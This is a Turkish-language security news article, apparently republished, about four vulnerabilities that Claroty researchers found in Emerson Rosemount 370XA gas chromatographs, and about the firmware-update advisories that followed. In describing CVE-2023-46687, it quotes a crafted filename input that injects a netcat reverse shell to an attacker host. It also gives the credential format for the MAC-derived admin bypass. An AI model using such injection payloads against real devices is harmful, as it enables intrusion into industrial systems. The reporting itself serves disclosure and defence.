Gaz Kromatograflarında Bulunan Çoklu Güvenlik Açıkları


Uç Nokta Güvenliği, Yönetim ve Risk Yönetimi, Nesnelerin İnterneti Güvenliği

Kritik Önemdeki Kusurlar Emerson Cihazlarını Siber Saldırılara Maruz Bırakıyor

Prajeet Nair (@prajeetspeaks) •
28 Haziran 2024

Gaz Kromatografilerinde Çoklu Güvenlik Açıkları Bulundu
Resim: Shutterstock

Emerson gaz kromatografilerindeki birden fazla kritik güvenlik açığı, kötü niyetli kişilerin hassas verilere erişmesine, hizmet reddi koşullarına neden olmasına ve keyfi komutlar yürütmesine olanak tanıyabilir.

Ayrıca bakınız: Gartner 2024 Magic Quadrant: Kurumsal Kablolu ve Kablosuz LAN Altyapısı

Kimyasal bileşikleri analiz etmek ve ayırmak için kullanılan gaz kromatografları kimya, çevre ve sağlık sektörleri de dahil olmak üzere birçok endüstrinin ayrılmaz araçlarıdır. Yaygın olarak kullanılan bir model olan Emerson Rosemount 370XA, cihaz ile teknisyenin bilgisayarı arasındaki iletişim için özel bir protokole dayanır.

Operasyonel teknoloji güvenlik firması Claroty’nin Team82’sindeki güvenlik araştırmacıları dört temel güvenlik açığı tespit etti: iki komut enjeksiyon açığı, bir kimlik doğrulama atlama ve bir yetkilendirme açığı. Bir komut enjeksiyon açığı, kritik ciddiyetini gösteren 9.8’lik bir CVSS v3 puanı aldı.

CVE-2023-46687 olarak takip edilen güvenlik açığı, “zorunlu kalibrasyon” komut türünün uygulanmasında bulunan, kimliği doğrulanmamış bir uzaktan kod yürütme veya komut ekleme güvenlik açığıdır. Güvenlik açığı, oluşturulmuş bir kabuk komutuyla çağrılan ve uygun şekilde temizleme yapılmadan kullanıcı tarafından sağlanan bir dosya adı içeren bir sistem işleviyle bağlantılıdır. Bu, bir saldırganın rastgele kabuk komutları enjekte etmesine olanak tanır.

Saldırgan, aşağıdaki gibi hazırlanmış bir girdi sağlayarak bunu istismar edebilir: gunzip -c ;nc -e /bin/sh ATTACKER_MACHINE 1337;> name_of_the_expanded_filebu da kök kabuk bağlamında rastgele kod yürütülmesine neden olur.

CVE-2023-51761 olarak izlenen diğer bir güvenlik açığı, bir saldırganın yönetici parolasını sıfırlamak için gizli bir parola hesaplayarak kimlik doğrulamasını atlamasına olanak tanıyan bir kimlik doğrulama atlama güvenlik açığıdır.

Parola, cihazın gizli bir bilgi olmayan ve kolayca elde edilebilen MAC adresinden türetilir. Parola doğrulama prosedürünü anlayan bir saldırgan, MAC adresini kullanarak parolayı oluşturabilir ve şu şekilde biçimlendirilmiş kimlik bilgilerini kullanarak yönetici ayrıcalıklarıyla oturum açabilir: EMERSON/{PASSPHRASE}.

CVE-2023-49716 olarak takip edilen güvenlik açığı, parola sıfırlama mekanizması yoluyla kullanıcı oturum açma işleminin atlanmasıdır. Bu güvenlik açığı, ağ erişimi olan, kimliği doğrulanmamış bir kullanıcının kimlik doğrulamayı atlayıp yönetici özelliklerini edinmesine olanak tanır.

Ele alınan son güvenlik açığı CVE-2023-43609 olarak izleniyor ve yeniden başlatma işlevi aracılığıyla yapılan bir komut enjeksiyonu. Bu kusur, ağ erişimi olan, kimliği doğrulanmış bir kullanıcının uzaktaki bir bilgisayardan rastgele komutlar çalıştırmasına olanak tanır.

Fiziksel bir cihaz elde etmenin yüksek maliyeti ve zorluğu nedeniyle araştırmacılar, analizleri için Emerson Rosemount 370XA’yı örnek aldılar. Cihazın protokol uygulamasındaki kusurları tespit ederek yük oluşturmalarına ve güvenlik açıklarını ortaya çıkarmalarına olanak sağladılar.

Örneğin, kimlik doğrulama atlama güvenlik açığı, saldırganların gizli bir parola hesaplamasına ve yönetici parolalarını sıfırlamasına olanak tanıyarak sistem güvenliğini tehlikeye attı.

Emerson bir güvenlik tavsiyesinde son kullanıcıların ürünlerdeki donanım yazılımını güncellemelerini önerdi. Siber Güvenlik ve Altyapı Güvenliği Ajansı da kusurlarla ilgili bir tavsiye belgesi yayınladı.





Source link